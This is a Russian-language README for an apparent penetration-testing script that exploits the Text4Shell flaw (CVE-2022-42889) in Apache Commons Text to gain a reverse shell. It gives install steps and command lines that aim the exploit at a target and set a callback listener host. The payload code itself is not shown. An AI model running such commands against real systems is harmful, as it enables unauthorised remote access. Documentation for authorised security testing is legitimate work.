
Доказательство концепции (PoC) для CVE-2022-42889 (Text4Shell), нацеленное на версии Apache Commons Text до 1.10.0. Этот скрипт автоматизирует удалённое выполнение кода (RCE) через интерполяцию скриптов для установки обратной оболочки (reverse shell). Эта версия представляет собой структурированную оптимизацию оригинального эксплойта, опубликованного на Exploit-DB (ID: 52261).
Этот скрипт представляет собой инструмент для пентестинга, предназначенный для эксплуатации уязвимости CVE-2022-42889, также известной как Text4Shell, в Apache Commons Text (версии < 1.10.0). Он автоматизирует доставку Java-полезной нагрузки для запуска обратной оболочки.
Эта реализация основана на публичном эксплойте: https://www.exploit-db.com/exploits/52261
Для работы скрипта требуются Python 3 и библиотека requests.
pip install requests
python3 exploit.py -t $IP -p $PORT -u <path> -param $PARAMETER -L $LHOST -P $LPORT
python3 exploit.py -t 10.10.10.10 -p 8080 -u /search/ -param query -L 10.10.14.5 -P 139
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный данным скриптом.